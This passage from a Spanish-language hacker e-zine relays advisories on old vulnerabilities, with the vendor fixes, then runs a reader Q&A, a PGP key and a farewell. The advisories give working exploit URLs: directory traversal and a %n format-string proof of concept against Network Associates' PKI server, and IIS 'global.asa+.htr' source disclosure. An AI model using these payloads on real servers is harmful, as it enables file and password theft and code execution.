el file system del servidor y ver/bajarse cualquier archivo si conoce su nombre. Por
defecto el enrollment server usa \Program Files\Network Associates\Net Tools PKI
Server\WebServer\enroll-server como el directorio root de Web, si un nombre de
archivo es conocido (por ej.: autoexec.bat) el atacante s olo necesita suministraar
el resto de los componentes del path para accederlo:
https://host:444/..\..\..\..\..\autoexec.bat
mostrara el contenido del archivo en el navegador.
Si un nombre de archivo no es conocido, el servidor web revelara su directorio root
de web en un mensaje de error mostrado al cliente:
https://host:444..\..\pirulo.pdf resultara en:
File Not Found
The requested URL /..\..\pirulo.pdf was not found on this server.
Tambien habia un poco mas de informacion adicional sobre el error:
[Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network
Associates\
Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed
for a.b.c.d, reason: File does not exist
Problema #3: Strings de Formato con datos suministrados por el usuario
El URL suministrado por el usuario es procesado por Strong.exe y si la extension
.XUDA es encontrada, el pedido es redireccionado a XUDAD.EXE para su procesamiento
Antes de efectuar este pase el string es parseado, filtrado de metacaracteres y
pasado a una funcion que loguea el pedido. En algun lugar de este camino de
procesamiento, la informacion suministrada por el usuario se convierte en el string
de formato para una funcion de salida formateada similar a sprintf() de ANSI C. Esto
permite a un atacante remoto proveer datos que forzaran a la funcion a sobreescribir
porciones arbitrarias de la memoria del proceso y causar un ataque de negacion de
servicio o la ejecucion de codigo arbitrario.
Para ejemplificar esto, el siguiente URL causara un DoS:
https://host:444/%25%25s.xuda
Notese que el valor hexa 0x25 representa el caracter ascii '%', por lo que el string
URL sera convertido en "%%s.xuda" yposteriormente en "%s.xuda".
Un ataque mas elaborado podria intentar sobreescribir la direccion de retorno en el
stack para forzar al servidor a ejecutar codigo arbitrario.
Prueba de concepto, URL de ejemplo:
https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x\
%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x\
%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x\
%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x\
%25n.xuda
nota: El string ha sido wrappeado para su mejor lectura.
Informacion sobre su arreglo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Network Associates In.c ha lanzado un Hotfix 3 para el Net Tools PKI Server.
Este soluciona los tres problemas. Puede ser obtenido de:
<http://www.nai.com/asp_set/download/upgrade/find.asp>
########################################################
# Sistema Operativo # Windos NT # Descripcion:Una ves mas los archivos del
############################################ servidor web de Microsoft pueden ver su
# Vulnerabilidad # IIS 4.0, 5.0 # codigo descubierto mediante una censilla
############################################ modificacion de la url.Segun se comprovo
# Fuente del Bug # www.hispasec.com # son multiples los servidores afectados
############################################ que dejan al descubierto la seguridad de
su sitio web.Este problema puede poner al descubierto las passwords de las bases de
datos, passwords administrativas, y detalles del funcionamiento del servidor web o de
la logica de negocio del sitio. Para explotar la vulnerabilidad bastara con solicitar
un nombre de archivo existente, por ejemplo global.asa seguido de el caracter + y la
extension ".htr". De esta forma, cuando se encuentra un "+" en el nombre de archivo,
ISM.DLL truncara el "+.htr" y abre el archivo solicitado. Si dicho archivo no es un
.htr parte del codigo fuente quedara expuesto al atacante. Por ello, el intruso podra
recuperar el contenido de archivos como el global.asa que contienen a menudo
informacion sensible como el nombre de usuario y password del servidor SQL. El ataque
es tan sencillo como construir la url de la siguiente forma:
http://www.servidor.afectado.com/global.asa+.htr
El ataque no permitira modificar datos de las paginas, pero si acceder a informacion
sensible que permita desarrollar otro tipo de ataques. Microsoft ha publicado los
parches necesarios para cubrir esta vulnerabilidad, cuya instalacion se recomienda a
todos los administradores de Internet Information Server 4 o 5. Otra solucion posible
es desactivar el soporte de archivos .htr.
Mas informacion: Boletin de seguridad de Microsoft:
http://www.microsoft.com/technet/security/bulletin/MS00-044.asp
Autor : EleKtr0
Titulo : Bug`s & Exploit`s
Linkz : Agradecimientos a:
www.hispasec.com
www.core-sdi.com
www.bugtraq.com
¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
16
`°¤ø,¸,ø¤°
|=======================================================|
| Autor | El Editor | |
|=========== ======================== Seccion en construccion... hasta que |
| Titulo | Correo Electronico | que se desidan a mandarme sus comentarios |
|=========== ======================== dudas,preguntas,consultas,interrogantes |
| Correo | electron_team@usa.net | proposiciones, ideas, articulos, criticas |
|=========== ======================== hasta ese entonces, esta seccion seguira en|
| Comentario| Y que piensas ahora? | construccion |
|=========== ======================== bye! |
| Contenido | .,-`^´-,. . .,-`^´-,. | |
|=========== ======================== ===================|
¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
17
`°¤ø,¸,ø¤°
Autor : ELECTRON SECURITY TEAM
Titulo : Intentando dar una Respuesta
E-mail : electron_team@usa.net
URL : www.electron-team.subnet.dk
Comentario: Y en esta ultima seccion del e-zine intentare nuevamente inovar, esta
ves tratare de iniciar un espacio donde los lectores se atrevan a preguntar y tmb
responder distintas preguntas,tratare de dar respuestas a sus inquietudes y dudas
de la mejor forma posible, los temas de las preguntas debieran ser variados,desde
hacking (aunk no sepa nada de eso,) hasta la definicion de algun concepto u idea
que no entiendas, como lo que yo se es muy poco, podria tocar el caso en que las
mismas dudas suyas sean las mias,en este caso dejare planteada la pregunta a ver
si otra persona que nos lee sabe algo al respecto, eso seria mas o menos, ahora a
enviar sus preguntas al correo oficial del e-zine: electron_team@usa.net
Como no hay preguntas, entonces yo hare unas cuantas a modo de ejemplo, pero
haciendo referencias alo que es este nuevo e-zine, nada de tecnisismos o algo por
el estilo, eso lo dejare para el sgt numero:
Contenido :
[Nota: antes de empesar con las preguntas me gustaria aclarar algo,no me ballan a
venir a preguntar cosas como,cual es el secreto para ser un hacker? o si acaso yo
aseptaria ser su maestro,o estupideses aun mayores que se les puedan ocurrir,pero
tmb decir que no por esto no bayan a preguntar, symplemente piensa un poco antes
de hacerlo, no tengas miedo a preguntar cosas tontas,solo teme cuando creas estar
llegando al limite de lo tonto y lo estupido!,te pongo un ejemplo de la vida real
cierta ves le preguntaron al PAPA, cuantas personas trabajan en el baticano??????
y el respondio, "alrededor de la mitad..." Otra cosa, esque no crean tampoco que
por querer responder a unas cuantas preguntas me las doy se sabelotodo o de guru,
nada de eso, cuidado que las malas lenguas y los mal hablados abundan en demasia]
==================================
Preguntas de esta primera edicion:
==================================
(-01-)... Que es exactamente ELECTRON SECURITY TEAM, e-zine ?¿
(-02-)... Por que ELECTRON ?¿
(-03-)... Cual es el objetivo del e-zine?
(-04-)... Donde puedo conseguir el e-zine ¿?
(-05-)... Cada cuanto saldra un nuevo numero ¿?
(-06-)... Como puedo unirme al Team del ELECTRON ?¿?
(-07-)... Como puedo colaborar al e-zine ?¿
(-08-)... Como puedo empezar en el mundo de lo Under¿
=============================
Intentando dar una Respuesta:
=============================
(-01-)... Que es exactamente ELECTRON SECURITY TEAM, e-zine ?¿
Realmente lo que tengo en mente con ELECTRON SECURITY TEAM, es poder
llegar a formar un grupo determinado de personas que al igual que yo
sean adictas a la informatica y en conjunto seguir adelante con esta
noble causa de informar a nuestra gente... el numero de personas es
por el momento un enigma,al igual que su nacionalidad,ya que no solo
chilenos nos leeran, en todo caso no! quiero poner un numero limite,
en cuanto a los integrantes del Team respecta, eso kiere por ejemplo
desir k podrian ser unos 15, por desir algo o seguir siendo uno solo
como lo es hasta el momento... sera un equipo abierto y siempre
dispuesto a recibir nuevos miembros.
(-02-)... Por que ELECTRON ?¿
Me creeran que eso ni yo lo se!,no es broma,lo que pasa esque si nos
ponemos a pensar un poco en lo que es la computacion y la sociedad
actual, o mas que sociedad HUMANIDAD, por que yo me pregunto lo sgt:
que seria este mundo sin la energia electrica?¿?¿ uff! un verdadero
desastre, y ahora bien me nace otra pregunta,que seria de la energia
o k seria de la electricidad sin el ELECTRON?como todo el mundo debe
saberlo, la electrcidad es un flujo de electrones, en un determinado
material (conductor electrico) y esto es posible al fenomeno llamado
"electron de valencia" que vendria a ser el ultimo electron que se
desprende del atomo del material, ese electron choca! a otro atomo y
logra desprender a otro electron de valencia y haci respectivamente,
con esto se da nacimiento a la Electricidad, y con ella nacen nuevas
tecnologias y estas asu ves aportan al desarrollo de la HUMANIDAD
Por que sin el electron nada de esto existiria y todo seria parte de
un lindo sue¤o de adas.
La misma importancia que tiene el electron atomico para la humanidad
pretendo k la tenga el ELECTRON electronico, para la comunidad Under
ya sea nacional o internacional... Sin duda que es un lindo concepto
pero que atraves del tiempo y sobre todo con la ayuda de ustedes los
lectores se ira haciendo una realidad.
(-03-)... Cual es el objetivo del e-zine?
El objetivo de este e-zine, no se aleja demasiado de lo que es el
objetivo principal de un e-zine,creo que este consepto aun no cambia
pero intentare educar junto amis futuros compa¤eros, a la comunidad
UnderGround, poniendole a su disposicion informacion que normalmente
esta indocumentada o en otro idioma, ademas que lo hago por que me
gusta, por que es lo mio (eso creo...) y por el symple regosijo que
personalmente siento al educar a otras personas
(-04-)... Donde puedo conseguir el e-zine ¿?
Por el momento no tengo muchos distribudores del e-zine,pero ya en un
corto tiempo deberia estar en Zine Store,VanHackez y en algunas otras
web`s que se dedican a distribuir e-zines, por el momento solo podras
conseguirlo en: www.electron-team.subnet.dk ,k es una dire momentanea
mientras pueda conseguirme un dominio, que seria lo ideal.
(-05-)... Cada cuanto saldra un nuevo numero ¿?
Baya preguntita... pero es necesario aki aclarar algo!, la salida del
proximo numero depende muchisimo de la aseptacion k tenga el ELECTRON
depende mucho de las criticas, comentarios y opiniones que se generen
de este primer numero, tmb depende mucho del apoyo k resiba por parte
de mis compatriotas y de la misma comunidad Under, depende de cuanta
gente se me kiera unir, de cuantos quieran participar, de cuantos tmb
kieran ayudar, en fin... y por sobre todo depende de mi y de mi animo
ya que no es nada gracioso hacer un e-zine sin tener Inet en tu casa,
ademas k aki entra a jugar un factor muy importante el estudio,yak no
me a hido muy bien que digamos y tmpoco es la idea descuidar algo que
me ayudara a concretar lo que es my proyecto de vida, pretendo seguir
estudiando y no seria bueno que no le preste la atencion k es debida,
yo calculo y ojala asi sea que el proximo numero se asome mas o menos
en 1 mes y medio, pero como les dije todo depende!... ya despues con
el futuro Team conformado seria cada un mes la salida, aunque siempre
suceden cosas que atrasan el mes... pero bueno, veamos como se portan
los futuros miembros del equipo primero!
(-06-)... Como puedo unirme al Team del ELECTRON ?¿?
Si yo FUMO y tengo el pelo largo, no tengo ningun derecho de exigirle
a mi hijo que se corte el pelo y deje de fumar, por que yo no lo hago!
Entonces para pertenecer al Team, no les voy a pedir pruebas, ni algun
tipo de capasitacion :) ni k sean Hackers o que dominen la informatica
al %200 ni nada por el estilo,solo voy a pedir esfuerzo! y dedicacion!
con una cucharada de compromiso y responsabilidad, esas son las unicas
condiciones que pongo, quienes crean tener esos valores bien puestos,
entonces mandenme la respectiva peticion a zok_electron@usa.net,yo les
enviare la respuesta lo mas pronto posible, para que empesemos a
trabajar de lleno en lo que vendra!
(-07-)... Como puedo colaborar al e-zine ?¿
Muchas son las maneras de ayudarme con el e-zine, por ejemplo puedes
ayudar publicandolo en tu web, haciendole propaganda,difundiendolo por
ahy, mandando mail`s de apoyo, escribiendo articulos, incluso podrias
ayudar en el dise¤o de la pajina, todas esas son formas de ayudar con
el e-zine,
(-08-)... Como puedo empezar en el mundo de lo Under¿
Aunque la pregunta no tiene nada que ver con el tema,si esta ligada al
proposito general del e-zine, ademas con algo tenia que rellenar :)
Leyendo temas Under,como por ejemplo e-zines como este o PR o FYE,esos
serian buenos indicios para empesar en el mundo UnderGround, pero como
todo en la vida esto requiere sacrificio y dedicacion por parte tuya!,
de nada sirve leer y leer sino practicas, la practica ense¤a mucho mas
que lo teorico, adelante! intentalo...
Autor : ELECTRON SECURITY TEAM
Titulo : Intentando dar una Respuesta
E-mail : electron_team@usa.net
URL : www.electron-team.subnet.dk
¸,ø¤°´¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
18
`°¤ø,¸,ø¤°
Autor : Electron Security Team
Titulo : Llaves PGP
|=================|============================|
| Electron_Team | electron_team@usa.net |
|=================|============================|
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGPfreeware 6.5.3 for non-commercial use <http://www.pgp.com>
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
=8OWZ
-----END PGP PUBLIC KEY BLOCK-----
Autor : Electron Security Team
Titulo : Llaves PGP
Saludos : Zimmerman?¿
¸,ø¤°´¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°``°¤ø¸
,ø¤°``°¤ø¸
19
`°¤ø,¸,ø¤°
Autor : El editor
Titulo : Despedida y Comentario Final
Llego la maldita hora de tener que despedirce, como todo en la vida tenia
que haber un final, a pesar de todo estoy contento por haber podido con
esta gran responsabilidad de llevar a la escena una nueva propuesta,ya no
puedo esperar mas para sacar el proximo numero, que por cierto vendra muu .oH*E*E*Ho.
weno, eso espero, aparte que estoy seguro que mas de alguien se me unira x*#"~```"!Rn·$
y asi ser cada dia mas y mejores!...ahora bien no quiero quedarme con ese z!~ ~@!
mal sabor de estar peleado con NoKeyZ, tmpco me arrepiento de lo que dije xZ~ `Mi
ellos saben que todo es veridico, pero en verdad lo que me molesto,fue la$? ^%$%·$·#~~·€]ç*`$
actitud de ellos hacia mi persona, me dieron donde mas me duele! y eso ni$L8"··$·$%#~#~€P*:$¸
cagando lo hiba a dejar pasar por alto!, ellos saben ahora lo que tiene k ?B
hacer... Recuerden siempre, que podremos ser muy buenos sentados frente a `?NL
un tarro,podemos tener mucha habilidad con los computadores,podemos saber `#$m.......u@#~
mucho de informatica,pero si hay algo que nunca debemos dejar de lado: es ~H#tWXW$*"`
nuestra condicion de seres humanos y tmb debieramos pretender ser buenos
como persona,este mundo esta cada vez mas desumanisado y eso no es ningun ELECTRON
avanse sino un retroceso hacia la era cabernicola,pretendamos que haci de
buenos k somos con un compuador, lo seamos frente a otra persona,para eso SECURITY TEAM
hay que tener valores y bien puestos!. Espero anciosamente que nos veamos
en la proxima entrega, hasta entonces, bye!, bye! y gracias,,,
www.electron-team.subnet.dk
¸,ø¤°´¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤º
¸,ø¤°´¤ø¸¸,ø¤°`°¤ø,¸ ELECTRON ø¤°` SECURITY °¤ø¸¸,ø TEAM ø¸¸,ø¤°`°¤ø¸¸,ø¤°
¸,ø¤°´¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø,¸,ø¤°`°¤ø¸¸,ø¤°`°¤ø¸¸,ø¤°
